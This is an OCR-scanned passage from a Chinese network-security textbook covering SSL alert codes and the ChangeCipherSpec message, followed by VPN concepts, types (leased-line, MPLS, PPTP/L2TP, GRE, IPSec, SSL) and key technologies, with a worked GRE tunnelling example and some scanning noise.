43 Unsupported_certificate 不 支持 的 证 书 
44 Certificate_revoked 证 书 作废 
45 Certificate_expried 证 书 期 满 
46 Certificate_unknown 证 书 未 知 
47 Tllegal_parameter 非法 参数 


5. SSL 交换 密码 规范 协议 

SSL 交换 密码 规范 (change cipher spec) 协 议 只 有 一 种 ChangeCipherSpec 消息 ,用 于 改 
变 当前 的 密码 规范 。 客 户 端 或 者 服务 器 使 用 此 种 消息 通知 对 方 ,将 采用 新 的 密码 规范 和 密 
钥 来 加 密 数 据 记录 。 此 种 消息 一 般 需 要 在 SSL 握手 协议 的 Finished 消息 发 送 之 前 进行 。 


8.2 VPN 技术 


8.2.1 VPN 的 含义 


网 络 技 术 的 发 展 为 人 们 的 生产 生活 带 来 了 极 大 的 便利 ,人 类 生活 的 很 多 方面 越 来 越 多 
地 与 网 络 应 用 、 网 络 通信 相 联系 。 但 是 ,公共 网 络 由 于 其 开放 性 和 低 安 全 性 并 不 适用 于 一 些 
网 络 应 用 的 需要 。 类 似 电子 商务 .网 络 银行 .具有 多 家 分 支 结构 公司 的 内 部 通信 这 样 对 于 安 
全 有 更 高 要 求 的 业务 不 适合 通过 公共 网 络 进行 通信 。 而 为 每 家 公司 、 每 种 应 用 布设 专门 的 
网 络 也 会 因为 代价 高 昂 而 不 切实 际 。 为 了 解决 这 个 矛盾 ,人 们 发 展 了 VPN 技术 。 

虚拟 专用 网 (Virtual Private Network,VPN) 是 指 在 公用 网 络 上 建立 的 专用 网 络 。 其 
具有 稍微 高 于 公共 网 络 的 使 用 价格 ,基本 接近 于 专用 网 络 的 应 用 性 能 ,具有 极 佳 的 性 价 比 。 

为 了 方便 理解 后 面 对 于 虚拟 专用 网 知识 的 介绍 .首先 来 看 看 公共 网 络 和 专用 网 络 都 有 
什么 样 的 好 处 。 
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在 这 个 讨论 中 ,公共 网 络 的 优势 可 以 从 两 个 方面 来 看 。 一 方面 是 覆盖 面 广 。 特 别 是 由 
于 互联 网 的 存在 ,可 以 让 世界 上 极 广泛 地 区 的 用 户 都 有 很 便利 的 互相 通信 的 可 能 ,只 要 他 那 
里 能 够 接 人 互联 网 。 另 一 方面 是 价格 便宜 。 从 根本 上 说 ,网 络 的 价格 大 致 是 由 所 有 用 户 依 
据 使 用 量 来 承担 的 。 公 共 网 络 使 用 者 多 ,设备 利用 率 高 ,虽然 整个 网 络 的 造价 非常 高 ,但 具 
体 落 实 到 每 个 用 户 的 花费 却 很 少 。 

而 专用 网 络 的 优势 也 可 以 从 这 样 三 个 方面 来 看 。 一 方面 是 网 络 具 有 比 公共 网 要 高 的 安 
全 性 。 专 用 网 内 可 以 保证 通信 双方 的 确 是 内 部 人 员 而 不 是 搞 社会 工程 学 攻击 的 欺骗 者 , 信 
息 内 容 和 来 源 的 正确 性 有 较 高 保证 。 外 部 人 员 也 很 难 直 接 在 通信 线路 上 做 监听 ,消息 不 易 
泄露 。 另 一 方面 是 用 户 对 网 络 有 更 高 的 自主 性 ,配置 怎样 的 JP, 乃至 使 用 何 种 协议 ,都 是 可 
以 自主 灵活 选择 的 。 这 对 于 网 络 的 管理 是 有 好 处 的 ,比如 说 上 海 总 部 可 以 统一 设置 为 
172. 16. 0.0 网 段 ,北京 分 部 可 以 设置 为 172. 17. 0. 0 网 段 , 对 于 内 部 相互 访问 以 及 对 访问 权 
限 的 控制 很 方便 。 而 如 果 使 用 互联 网 ,ISP 提供 的 地 址 不 仅 用 户 无 法 自主 ,还 可 能 是 会 有 变 
化 的 ,使 用 起 来 就 不 那么 方便 (如 用 户 将 之 用 于 某 个 服务 器 )。 专 用 网 还 有 一 个 方面 的 优点 
就 是 速度 快 、 时 延 小 ,这 对 于 部 分 时 间 敏 感度 高 的 应 用 比较 重要 。 公 共 网 络 上 通信 一 般 经 过 
的 设备 会 比较 多 ,实际 的 线路 长 度 也 比较 长 ,这 都 会 造成 更 大 的 时 延 。 互 联网 上 的 IP 协议 
运行 原则 是 “尽力 传输 ,不同 数据 包 经 过 的 路 线 也 可 能 会 不 同 , 时 延 除 了 长 之 外 还 将 不 够 稳 
定 。 公 共 网 络 使 用 者 比较 多 , 当 网 络 拥塞 时 通信 会 受到 其 他 用 户 通 信 的 干扰 ,这 在 不 采用 
QoS( 服 务 质量 ) 时 尤其 突出 。 


8.2.2 VPN 的 分 类 


首先 从 某 一 视角 ,可 以 把 VPN 简单 地 分 为 两 个 大 类 ,“ 专 线 ” 类 和 “协议 ”类 。 实 际 上 
“专线 ”都 是 需要 网 络 层 以 下 的 协议 来 实现 的 ,而 “协议 ”类 大 部 分 都 是 需要 网 络 层 以 上 协议 
来 实现 的 。 这 个 视角 其 实 是 依据 虚拟 专用 网 采用 怎样 的 方式 在 公共 网 络 上 传输 自己 的 数据 
包 来 分 类 : 是 按照 固定 的 有 一 定 通 信和 品质 保障 的 路 线 来 传输 ; 还 是 用 普通 公共 网 络 数据 
包 的 形式 传输 。 

专线 类 的 网 络 主要 有 物理 专线 专用 网 、 虚 电路 虚拟 专用 网 ,MPLS 虚拟 专用 网 。 

(1) 物理 专线 专用 网 。 局 域 网 就 是 采用 物理 上 的 专门 线路 。 采 用 物理 专线 的 网 络 ,是 
真正 的 专用 网 ,并 非 虚 拟 。 

对 于 小 范围 的 网 络 ,物理 上 的 专线 造就 的 专用 网 是 可 行 的 。 但 是 更 大 范围 的 专线 ,比如 
说 跨国 公司 建立 一 个 跨 洲 越 洋 的 专线 网 络 一 一 这 种 网 络 的 成 本 必然 由 公司 自己 承担 ,是 不 
现实 的 。 当 然 , 如 果 是 类 似 大 国 军队 这 样 的 机 构 是 可 能 建立 起 稍微 小 型 些 的 物理 专线 专用 
网 络 的 。 

物理 专线 的 网 络 ,其 时 延 、 网 络 自主 性 都 很 好 ,网 络 安全 性 也 比较 高 。 但 这 里 要 提醒 的 
一 个 问题 是 ,专线 的 网 络 不 是 就 一 定安 全 。 当 通信 距离 较 远 时 ,通信 线路 会 经 历 成 百 上 千 公 
里 的 距离 ,也 需要 若干 通信 设备 来 维持 其 运行 。 漫 长 的 距离 ,众多 设备 , 想 要 做 到 完全 安全 
是 很 难 的 ,恶意 的 窃听 者 或 者 自 夺 者 总 能 找到 可 乘 之 机 。 在 冷战 时 期 ,美国 人 就 曾经 使 用 核 
潜艇 潜入 鄂 霍 次 克海 , 堪 称 在 苏联 太平 洋 舰 队 的 眼皮 底下 成 功 地 窃听 了 其 军用 海底 电缆 。 
并 且 在 海底 电缆 上 安置 了 一 台 重 达 上 千 公 斤 的 由 核电 池 驱 动 、 磁 带 记 录 数 据 并 可 持续 工作 
一 年 以 上 的 窃听 装置 ,收集 了 大 量 的 情报 。 
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(2) 虚 电 路 虚拟 专用 网 。 物 理 专 线 需要 布设 专门 的 线路 与 设备 ,花费 之 高 昂 , 能 用 得 起 
的 机 构 很 少 。 而 一 些 数据 链 路 层 协议 却 可 以 在 公共 网 络 上 实现 类 似 的 功能 ,一 个 典型 的 例 
子 就 是 帧 中 继 协 议 。 

帧 中 继 协议 (frame-rely) 是 电信 运营 商 们 构建 自己 运营 的 公共 网 络 时 较为 常用 的 协议 。 
其 数据 帧 头 没有 mac 地 址 这 样 的 内 容 , 而 有 一 个 叫 作 “ 虚 电 路 号 ”的 字段 , 帧 中 继 交 换 机 在 
收 到 数据 帧 时 会 依据 自身 的 配置 按照 虚 电 路 号 来 决定 如 何 从 指定 的 端口 来 转发 数据 帧 。 这 
样 , 只 要 各 个 帧 中 继 交 换 机 的 相关 配置 不 变 , 特 定 虚 电路 号 的 数据 帧 每 次 都 会 通过 固定 的 通 
信 线 路 ,经 过 若干 固定 的 通信 设备 ( 帧 中 继 交 换 机 ) 抵 达 信 宿 端 。 固 定 线 路 、 固 定 设备 ,这 与 
物理 专线 是 很 类 似 的 。 这 种 状况 下 ,只 要 再 为 特定 虚 电 路 设置 恰当 的 优先 级 等 配置 ,使 该 虚 
电路 号 的 数据 帧 传送 时 都 能 保证 足够 的 带宽 和 小 的 时 延 ,如 此 获得 的 虚拟 专用 网 性 能 就 和 
真正 的 专用 网 非常 接近 了 。 

通过 公共 网 络 上 支持 虚 电路 功能 的 数据 链 路 层 协议 来 维持 一 个 虚拟 专用 网 ,其 性 能 和 
物理 专线 类 似 , 但 费用 要 少 得 多 ,从 而 有 非常 优秀 的 效 费 比 。 

但 是 ,既然 是 依靠 数据 链 路 层 协 议 来 搭建 的 VPN, 那 么 此 类 VPN 的 覆盖 范围 也 就 被 限 
制 在 运行 此 数据 链 路 层 协议 的 单一 网 络 之 中 ,此 网 络 覆盖 到 哪里 ,VPN 才能 安装 到 哪里 。 

(3) MPLS 虚拟 专用 网 。 基 于 数据 链 路 层 虚 电 路 虚拟 专用 网 ,会 受到 单一 网 络 覆盖 范 
围 的 限制 ,其 布置 的 灵活 性 远 达 不 到 互联 网 的 水 平 。 而 如 果 使 用 MPLS 协议 则 可 以 实现 更 
广泛 范围 的 “专线 ”VPN。 

多 协议 标签 交换 (Multi-Protocol Label Switching, MPLS) 协 议 , 可 以 视 为 是 一 种 在 数 
据 链 路 层 和 网 络 层 之 间 的 协议 ,有 人 称 为 2. 5 层 协议 。MPLS 数据 包 会 在 数据 链 路 层 包头 
和 网 络 层 包 头 之 间 放 置 最 多 32 位 的 标签 信息 ,如 图 8-14 所 示 。 

一 个 数据 包 在 最 初 进 入 MPLS 处 理 时 ,首先 会 依照 处 理 该 数据 包 设备 的 路 由 表 为 数据 
包 添 加 MPLS 标签 。 此 后 经 过 的 各 跳 路 由 器 都 只 依据 MPLS 标签 对 数据 包 进 行 处 理 , 直 到 
最 后 一 跳 路 由 器 数据 包 才 会 再 次 进行 IP 处 理 。 也 就 是 说 , 它 在 数据 转发 过 程 中 ,只 在 网 络 
边缘 分 析 IP 报 文 头 ,而 不 用 在 每 一 跳 都 分 析 IP 报 文 头 , 从 而 节约 了 处 理 时 间 。 

0 20 23 24 32 


8-14 MPLS 协议 示意 图 


MPLS 最 初 是 为 了 提高 转发 速度 而 提出 的 ,该 协议 独立 于 数据 链 路 层 和 网 络 层 ,其 既 有 
数据 链 路 层 交 换 快 捷 的 特点 ,又 有 网 络 层 可 以 跨越 不 同 数据 链 路 层 ( 亦 即 跨越 不 同 网 络 ) 的 
特点 。 而 每 次 做 MPLS 处 理 时 ,路 由 设备 会 依据 固定 的 标签 值 做 固定 的 转发 处 理 ,从 而 可 
以 保证 特定 标签 值 的 数据 包 都 走 一 条 固定 的 线路 。 辅 以 一 定 的 服务 质量 设置 ,可 以 保证 这 
条 路 线 的 带宽 等 性 能 。 和 虚 电 路 VPN 类 似 , 这 也 是 一 种 性 能 上 很 接近 物理 专线 的 VPN 实 
现 方 式 。 

在 当前 ,MPLS 是 “专线 ? 式 VPN 最 流行 的 实现 手段 。 但 是 ,数据 包 在 做 MPLS 标签 处 
理 的 时 候 需 要 处 理 设备 知晓 从 其 自身 到 达 目 的 IP 的 详细 路 由 信息 ,所 以 一 般 只 适合 在 同一 
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个 ISP 内 部 建设 VPN。 如 果 想 跨 ISP 建设 MPLS VPN 则 需要 不 同 的 ISP 做 一 些 深入 的 合 
作 , 需 要 将 彼此 的 路 由 信息 注入 对 方 网 络 。 这 牵涉 较 多 的 商业 合作 问题 并 会 影响 到 各 自 网 
络 的 动态 路 由 协议 收敛 性 能 ,所 以 一 般 还 是 只 在 同一 个 ISP 内 部 建设 此 种 VPN。 

前 面 介绍 的 3 种 专线 类 的 网 络 , 有 两 种 属于 VPN ,它们 在 公共 网 络 上 传送 数据 包 时 会 
按照 固定 的 、 较 安全 且 有 品质 保障 的 线路 来 传输 数据 ,这 一 点 和 真正 的 专用 网 很 类 似 。 这 类 
形式 的 VPN 都 有 较 高 的 传输 速度 和 较 小 时 延 。 在 安全 上 ,运营 商 则 会 对 负担 VPN 的 设备 
与 线路 做 更 高 的 保护 ,并 做 出 绝对 不 进行 监听 、 抓 包 的 商业 承诺 ,这 对 于 一 般 公司 的 普通 商 
业 办 公安 全 来 说 基本 上 已 经 够 用 了 。 但 是 要 建立 此 类 VPN 都 需要 和 电信 行业 运营 商 , 签 
订 专 门 的 服务 ,付出 高 于 普通 接 入 的 费用 。 而 VPN 的 覆盖 范围 也 会 受到 单一 网 络 或 ISP 
覆盖 面 的 限制 。 

对 于 协议 类 的 VPN ,包括 : 数据 链 路 层 的 PPTP、L2TP 协议 ; 网 络 层 的 IPSec`.GRE 协 
议 ; 传输 层 的 SSL/TLS 协议 。 由 于 在 当前 这 个 视角 下 主要 看 不 同 VPN 通过 公共 网 络 的 方 
式 , 因 此 这 里 只 介绍 使 用 这 些 协 议 的 VPN 通过 公共 网 络 的 方式 。 简 单 而 言 ,这 就 是 “隧道 ” 
模式 : 通过 一 种 特定 协议 的 网 络 ,传输 其 他 协议 的 数据 包 。 

(1) 使 用 数据 链 路 层 协议 的 VPN。 数 据 链 路 层 的 安全 协议 PPTP 和 L2TP, 是 较为 陈 
旧 的 协议 ,现在 已 较 少 使 用 。 这 两 种 协议 都 提供 了 为 PPP 连接 提供 穿越 公共 网 络 隧道 的 
功能 。 

其 中 ,PPTP 协议 (Point-to-Point Tunneling Protocol) 是 由 微软 基于 PPP (Point-to- 
Point Protocol) 协 议 设计 的 。 在 当时 的 条 件 下 ,众多 客户 一 般 都 通过 一 些 拨号 手段 ,通过 
PPP 协议 接 人 公共 或 专用 网 络 。 在 当时 ,一 些 公司 出 差 的 员工 ,可 能 会 有 使 用 公司 内 部 的 
一 些 不 对 公共 网 络 开放 的 重要 资源 的 需要 ,也 需要 拨号 访问 公司 内 部 服务 器 。 对 于 此 种 需 
求 ,无 论 是 建设 专用 网 还 是 直接 拨 公 司 的 长 途 电话 号 码 都 是 花费 比较 大 的 手段 。 

PPTP 协议 的 提出 ,为 较 廉 价 的 接 人 远程 专用 网 络 提供 了 便利 。 在 此 种 协议 运行 的 整 
体 结构 中 有 “PPTP 接 人 控制 器 ?和 “PPTP 网 络 服务 器 ”的 概念 。 出 差 员 工 之 类 的 远 端 客户 
可 以 通过 PPP 协议 拨号 到 PPTP 接 人 控制 器 ,由 其 通过 公共 的 IP 网 络 与 PPTP 网 络 服务 
器 连接 ,最 终 由 PPTP 网 络 服务 器 与 公司 内 部 网 络 进行 联系 ,如 图 8-15 所 示 。PPTP 协议 
实现 并 控制 了 一 条 穿越 公共 IP 网 络 的 隧道 ,在 隧道 中 传送 PPP 分 组 。 实 际 上 ,穿越 公共 IP 
网 络 的 隧道 是 由 GRE 协议 来 实现 的 。 而 PPTP 更 多 是 提供 对 隧道 及 传送 PPP 分 组 的 控 
制 。 总 体 来 说 ,PPTP 只 是 提供 了 第 二 层 的 隧道 功能 ,而 诸如 身份 认证 ,通信 机 密 性 、 通 信 完 
整 性 则 完全 没有 考虑 。 只 能 依靠 PPP 协议 自身 的 PAP.CHAP 和 MPPE 这 些 现在 看 来 有 
缺陷 的 机 制 来 实现 。 另 外 PPTP 的 控制 消息 采用 了 固定 格式 ,也 缺乏 灵活 性 。 

虽然 问题 很 多 ,但 PPTP 协议 在 较 早期 的 VPN 中 有 很 广泛 的 应 用 ,这 很 大 程度 上 是 因 
为 微软 地 位 的 原因 。 当 然 ,那个 时 代 网 络 安全 整体 水 平 的 局 限 性 是 更 大 的 原因 。 除 了 已 经 
介绍 过 的 缺点 外 ,该 协议 只 能 通过 IP 网 络 建立 隧道 ,而且 与 其 他 的 一 些 二 层 隧 道 协议 兼容 
性 不 好 。 为 了 解决 这 些 问 题 , 微 软 与 思科 公司 于 1996 年 联合 提出 了 L2TP 协议 。 相 比 
PPTP,L2TP 协议 除了 能 利用 IP 网 络 ,还 可 以 在 其 他 形式 的 公共 网 络 上 建立 用 于 VPN 的 
隧道 ,控制 消息 格式 更 为 灵活 ,在 身份 认证 上 采用 了 类 似 PPP 的 CHAP 机 制 增强 了 些 身份 
认证 方面 的 安全 性 。 但 是 ,在 其 他 方面 则 没有 什么 改进 。 

总 体 来 说 ,以 今天 的 眼光 来 看 ,类 似 PPTP、L2TP 这 些 的 数据 链 路 层 安 全 协议 存在 着 许 
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远程 拨号 用 户 


本 PPTP 网 络 服务 器 
PPTP 接 入 控制 器 Cn 总 部 防火 墙 


图 8-15 PPTP 工作 示意 图 


多 缺点 。 现 在 ,即便 是 仍然 使 用 它们 来 为 VPN 建立 穿越 公共 网 络 的 隧道 ,也 需要 类 似 
IPSec 之 类 的 协议 来 配合 。 

(2) 使 用 网 络 层 协议 的 VPN。IPSec 协议 在 前 面 介绍 过 ,尤其 是 在 介绍 其 实现 方式 的 
时 候 介 绍 过 IPSec 的 隧道 模式 一 一 如 何在 IPSec 隧道 上 传输 普通 的 IP 数据 包 。 而 从 某 种 
意义 上 来 说 ,IPSec 隧道 本 身 则 可 以 视 为 是 在 普通 的 IP 网 络 中 以 GRE 协议 实现 的 。 通 过 
GRE 协议 完成 了 IP 协议 网 络 上 的 IPSec 数据 包 的 隧道 传输 。 关 于 GRE 协议 ,在 介绍 
PPTP 协议 的 时 候 提 到 过 ,PPTP 用 其 在 IP 网 络 上 传输 PPP 协议 的 分 组 。 

通用 路 由 封装 (Generic Route Encapsulation，GRE) 协 议 ,是 一 种 在 任意 网 络 层 协议 上 
封装 任意 其 他 协议 的 一 种 专门 的 隧道 协议 。 在 这 里 就 是 要 在 IP 协议 之 上 运行 任意 其 他 的 
网 络 协议 ,如 此 将 在 IP 网 络 上 形成 一 个 其 他 协议 的 隧道 。 

简 而 言 之 ,GRE 的 处 理 方式 就 是 把 任意 的 其 他 协议 数据 包 作 为 IP 数据 包 的 数据 部 分 
在 IP 网 络 上 传送 。GRE 协议 运行 示意 图 如 图 8-16 所 示 。 

网 络 A 与 B 通 过 运行 IP 协议 的 Internet 进行 X 协议 的 通信 ,两 个 网 络 与 Internet 的 
边界 分 别 是 路 由 器 R1 与 R2。 事 先 , 人 们 需要 在 两 台 路 由 器 上 设置 指向 彼此 的 隧道 ,并 指 
定 何 种 路 由 转发 情况 下 使 用 隧道 。 当 X 协议 的 数据 包 从 A 网 络 抵达 路 由 器 R1 后 ,R1 会 依 
据 自 己 的 路 由 原则 来 选择 转发 方式 .如 果 发 现 需 要 通过 某 一 隧道 ,Rl 将 生成 一 个 IP 数据 
包 , 该 数据 包 源 地 址 为 R1, 目 的 地 址 为 定义 好 的 隧道 男 一 端 R2, 整 个 X 协议 数据 包 将 作为 
此 IP 数据 包 的 数据 部 分 。 当 数据 包 抵达 R2 时 , R2 会 恢复 出 X 协议 数据 包 来 交 到 B 网 络 
中 。 如 此 便 实现 了 通过 IP 网 的 X 协议 通信 。 


Internet 
ss Ce Wa 
RI1 R2 
x 协议 网 络 隧道 部 分 X 协 议 网 络 
X 协 议 数据 包 隘 道 协议 |P 头 | 原 X 协 议 数据 包 x 协议 数据 包 


隧道 中 的 数据 包 结 构 


图 8-16 GRE 协议 运行 示意 图 
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再 来 专门 看 一 下 一 个 以 GRE 封装 IP 数据 包 的 例子 。 如 图 8-17 所 示 ,假设 一 个 公司 内 
部 网 络 的 了 了 设置 为 : 总 部 为 Intranet 专用 的 172. 16. 0. 0 网 段 , 某 分 支 机 构 为 Intranet 专用 
的 172. 17. 0.0 网 段 , 掩 码 采 用 默认 16 位 。 假 设 总 部 与 该 分 支 机 构 内 部 网 络 的 边界 路 由 器 
R1 和 R2 的 公共 网 络 IP 地 址 分 别 为 1.1.1.1 和 2.2.2.2, 两 台 路 由 器 上 需要 设置 指向 彼此 
IP 地 址 的 隧道 。 设 置 路 由 表 , 令 R1 上 指向 172. 17. 0. 0 网 段 的 路 由 条 目 通过 指向 R2 的 隧 


道 传送 ; R2 上 指向 172. 16. 0.0 的 路 由 条 目 设置 为 通过 指向 R1 的 隧道 传送 。 
Il 2.2.2.2 
Internet 
172.16.0.0/16 is 下 Co tg 172.17.0.0/16 
R1 R2 
内 网 部 分 | 隧道 部 分 | 内 网 部 分 
外 部 IP 头 内 部 IP 头 
源 IP: 1.1.1.1 源 IP: 172.16.3.15 数据 部 分 
目的 IP: 2.2.2.2 目的 IP: 172.17.0.1 
GRE 协 议 IP 头 原始 IP 数 据 包 


隧道 中 的 IP over IP 数 据 包 
图 8-17 GRE 运行 IP over IP 的 例子 


现在 假设 要 实现 总 公司 某 IP 地 址 为 172. 16. 3. 15 的 机 器 访问 分 部 地 址 为 172. 17. 0. 1 
的 服务 器 。 总 部 机 器 发 生源 地 址 为 172. 16. 3. 15、 目 的 地 址 为 172. 17. 0. 1 的 数据 包 , 由 于 
是 发 往 其 他 网 段 ,该 数据 包 必 将 交 由 R1 处 理 。R1 依据 自身 路 由 表 确 定 该 数据 包 应 通过 隧 
道 传输 。 于 是 生成 新 IP 数据 包 ,包头 源 地 址 1.1.1.1, 目 的 地 址 2. 2. 2.2, 并 将 整个 原始 IP 
数据 包 作 为 数据 部 分 ,发 到 Internet 之 上 。R2 接收 到 该 数据 包 后 清除 外 部 IP 头 ,将 原始 的 
源 地 址 为 172. 16. 3.15 目的 地 址 为 172. 17.0. 1 的 数据 包 交 给 分 支 机 构 内 部 网 络 由 相应 设 
备 接收 。 对 于 通信 双方 来 说 ,网 络 边界 路 由 器 的 隧道 处 理 对 于 他 们 是 透明 的 ,他 们 会 感觉 就 
如 同 在 一 个 完全 专用 的 、 可 以 自行 任意 设置 IP 和 网 络 结构 的 网 络 中 进行 通信 。 当 然 , 由 于 
使 用 了 只 提供 隧道 功能 的 GRE 协议 ,这 个 虚拟 专用 网 没有 多 少 安全 性 可 言 。 

(3) 使 用 传输 层 协议 的 VPN 。 传 输 层 的 安全 协议 SSL/TLS 在 前 面 已 经 介绍 过 了 。 此 
种 协议 的 数据 包 由 TCP 协议 传输 ,其 通过 公共 网 络 的 时 候 是 作为 普通 的 IP 数据 包 来 处 理 
的 。 虽 然 也 可 以 认为 其 是 通过 了 TCP/IP 的 隧道 ,但 由 于 它们 被 视 为 属于 同一 个 协议 簇 ,并 
没有 人 使 用 “隧道 ”这样 的 提 法 。 

通过 各 种 隧道 协议 ,或 者 类 似 SSL/TLS 那样 直接 利用 公共 网 络 上 的 协议 ,可 以 获得 一 
种 跨越 公共 网 络 布置 专用 网 的 途径 。 从 这 一 点 上 来 说 ,这 些 协 议 实现 了 与 “专线 同样 的 功 
能 : 穿越 公共 网 络 。 与 “专线 ”不 同 的 是 ,这 种 方式 的 VPN 数据 包 只 会 以 普通 IP 包 的 资格 
获得 “尽力 传输 ”的 待遇 ,从 而 网 络 性 能 上 会 有 所 人 欠缺。 但 付 给 运营 商 的 费用 更 低 , 对 于 不 太 
注重 速度 与 时 延 的 普通 专用 网 ,不失为 优秀 的 选择 。 

从 网 络 的 应 用 方式 .应 用 范围 角度 来 分 类 ,可 以 将 VPN 分 为 远程 接 入 VPN、 内 联网 
VPN、 外 联网 VPN。 
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(1) 远程 接 和 人 VPN(access VPN) : 又 称 为 拨号 VPN( 即 VPDN) ,是 指 通过 公共 网 络 远 
程 拨号 之 类 的 方式 构建 的 虚拟 网 ,可 提供 对 特定 网 络 资源 的 远程 访问 功能 。 适 用 于 出 差 的 
企业 员工 或 企业 的 小 分 支 机 构 连接 公司 网 络 。 远 程 接 人 VPN 为 用 户 通 过 离散 的 各 个 远程 
地 点 访问 特定 的 网 络 资源 提供 了 便利 ,有 很 多 合适 的 应 用 场景 。 

例如 ,出 差 员工 在 外 地 旅店 存 取 企业 网 数据 ,技术 支持 人 员 在 客户 的 网 络 中 访问 公司 的 
数据 库 查询 调试 参数 ,纳税 企业 接 入 互联 网 并 通过 VPN 进入 当地 税务 管理 部 门 进行 网 上 
税金 缴纳 。 

(2) 内 联网 VPN(intranet VPN): 一 个 公司 中 地 理 上 分 布 的 各 个 机 构 之 间 建 立 的 ,用 
于 连接 同 公司 不 同 机 构 网 络 中 资源 的 虚拟 专用 网 。 此 种 网 络 是 企业 内 部 网 在 空间 地 域 上 的 
扩展 。 对 于 类 似 跨国 公司 这 样 具 有 较 多 分 支 机 构 的 企业 是 很 必要 的 选择 。 

(3) 外 联网 VPN(extranet VPN): 某 产业 的 各 个 合作 伙伴 企业 共同 构建 Extranet, 将 
一 系列 公司 需要 彼此 共享 的 资源 进行 连接 的 虚拟 专用 网 。 

有 构建 外 联网 VPN 需求 的 数 个 企业 一 般 都 是 彼此 间 业 务 联系 比较 密切 的 企业 。 例 
如 ,同一 条 产业 链 上 的 各 个 供 货 商 与 分 销 商 之 间 , 购 物 网 站 、 网 络 商城 与 各 个 银行 之 间 。 再 
如 ,一 些 手机 销售 网 点 ,由 于 同时 会 有 办 理 手机 SIM 卡 、 存 话费 赠 手机 之 类 的 移动 电信 业 
务 , 就 需要 通过 VPN 连接 到 不 同 的 移动 电信 业务 供应 商 的 服务 器 上 ,进行 涉及 一 定数 量 金 
钱 的 数据 操作 。 


8.2.3 ”VPN 关键 技术 


VPN 的 关键 技术 主要 有 隧道 技术 .加密 技术 、 密 钥 管理 技术 .身份 认证 技术 ,管理 技术 。 
VPN 一 般 都 采用 某 种 安全 协议 来 实现 ,由 安全 协议 的 机 制 来 提供 部 分 或 者 全 部 技术 。 

1. 隧道 技术 

隧道 技术 是 VPN 的 最 基本 技术 ,可 以 说 ,没有 隧道 技术 就 没有 VPN。 作 为 建立 于 公共 
网 络 上 的 专用 网 ,VPN 一 般 都 需要 跨越 一 定 的 地 理 距离 ,需要 穿越 公共 网 络 。 如 何在 公共 
网 络 上 传输 VPN 的 数据 包 是 任何 VPN 需要 解决 的 基本 问题 。 

前 面 介绍 过 VPN 穿越 公共 网 络 的 两 大 类 方法 。 一 种 是 “专线 ?形式 , 另 一 种 是 “隧道 
形式 。“ 专 线 ” 形 式 需要 数据 链 路 层 的 虚 电 路 或 MPLS 协议 支持 , 且 需 要 链 路 沿途 的 各 个 设 
备 都 支持 相应 协议 ; 而 “隧道 ”形式 则 需要 以 隧道 协议 将 原始 数据 包 封 装 成 特定 的 可 以 传输 
于 公共 网 络 之 上 的 协议 格式 ,只 需要 在 源 端 和 目的 端 设备 上 做 额外 的 隧道 处 理 。 

一 般 而 言 ,使 用 “专线 "形式 的 VPN 具有 更 好 的 网 络 性 能 ,网 络 时 延 都 比较 短 ; 但 需 向 
ISP 支付 的 费用 要 高 一 些 ; 地 理 跨度 或 者 设置 接 和 人 点 的 灵活 性 也 会 受到 诸如 ISP 覆盖 面 之 
类 因素 的 影响 。 而 使 用 隧道 协议 方式 的 VPN 则 基本 不 受 地 理 跨度 和 ISP 覆盖 的 影响 , 支 
付 给 ISP 的 费用 也 相对 低廉 一 点 ,但 网 络 时 延 一 般 都 更 长 一 些 。 

2. 加 密 技术 

加 密 技术 是 VPN 建设 经 常 选择 的 可 选项 。 一 些 采用 “专线 ”形式 ,以 及 一 些 传输 数据 
不 够 重要 的 VPN 可 能 对 加 密 技术 没有 特别 的 要 求 。 但 对 于 隧道 协议 VPN 或 对 数据 安全 
有 更 高 要 求 的 情况 下 ,加 密 技 术 是 必要 的 选择 。 该 技术 是 VPN 传输 数据 保密 性 、 完 整 性 、 
抗 否认 性 的 保障 。 
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加 密 技术 是 一 项 较 成 熟 的 技术 ,传输 数据 的 对 称 加 密 、 消 息 验 证 码 、 数 字 签 名 都 需要 采 
用 加 密 技术 才 可 以 完成 。 该 技术 是 实现 VPN 安全 性 的 核心 技术 。 

在 保证 数据 完整 性 时 需要 用 到 MD5、SHA 之 类 的 消息 验证 码 算法 。 在 保证 数据 机 密 
性 的 情况 下 需要 用 到 3-DES、IDEA、AES 之 类 的 对 称 密 钥 加 密 算 法 。 在 保证 抗 否认 性 时 会 
用 到 类 似 DSA 或 者 RSA 十 信息 摘要 算法 的 数字 签名 算法 。 此 类 技术 一 般 都 由 VPN 使 用 
的 网 络 安全 协议 直接 提供 ,具体 情况 要 看 使 用 的 具体 安全 协议 和 用 户 的 配置 。 在 很 多 情况 
下 ,为 了 增强 安全 性 ,即便 是 采用 对 称 密 钥 加 密 算法 ,通信 双方 发 送 数据 使 用 的 密 钥 也 是 不 
同 的 。 

3. 密 钥 管理 技术 

有 了 密码 技术 ,就 必然 会 涉及 密 钥 管理 技术 。 没 有 保密 的 密 钥 ,加 密 技 术 就 是 空 耗 时 间 
做 的 无 用 功 。 没 有 好 的 密 钥 管理 ,加 密 技 术 的 应 用 是 没有 意义 的 。 

密 钥 管理 技术 主要 涉及 密 钥 的 生成 和 交换 。 如 何 真正 等 概率 随机 地 在 密 钥 空 间 内 生产 
出 密 钥 是 一 个 重要 的 事情 ,尤其 是 对 那些 比较 重要 的 机 密 数据 传输 而 言 。 可 以 在 网 络 中 引 
和 专门 的 加 密 机 或 其 他 有 硬件 生产 密 钥 功能 的 网 络 设备 ,一 些 较 新 版 本 的 操作 系统 也 有 收 
集 用 户 按键 盘 的 时 间 等 物理 事件 作为 密 钥 生成 依据 的 能 力 。 而 密 钥 的 传输 则 一 般 需 要 类 似 
SKIP 密 钥 管 理 协议 或 者 ISAKMP/OAKLEY 之 类 的 专门 协议 支持 。 

一 般 来 说 ,类 似 IPSec、SSL 之 类 的 安全 协议 ,其 本 身 都 直接 提供 对 隧道 技术 .加 密 技术 
和 密 钥 交 换 技术 的 支持 。 

4. 身份 认证 技术 

VPN 一 般 都 是 为 了 内 部 人 士 方便 、 安 全 地 访问 网 络 资源 。 但 是 部 分 网 络 资源 由 于 较为 
重要 和 敏感 ,需要 对 访问 者 进行 专门 的 甄别 ,这 就 需要 用 到 身份 识别 技术 。 

身份 识别 可 以 依照 被 访问 资源 的 重要 性 ,以 及 用 户 自 己 的 需求 与 条 件 , 采 用 不 同 的 形 
式 。 采 用 的 方式 可 以 是 简单 的 用 户 名 /口令 方式 ,还 可 以 是 指纹 等 生物 信息 ,还 可 以 使 用 智 
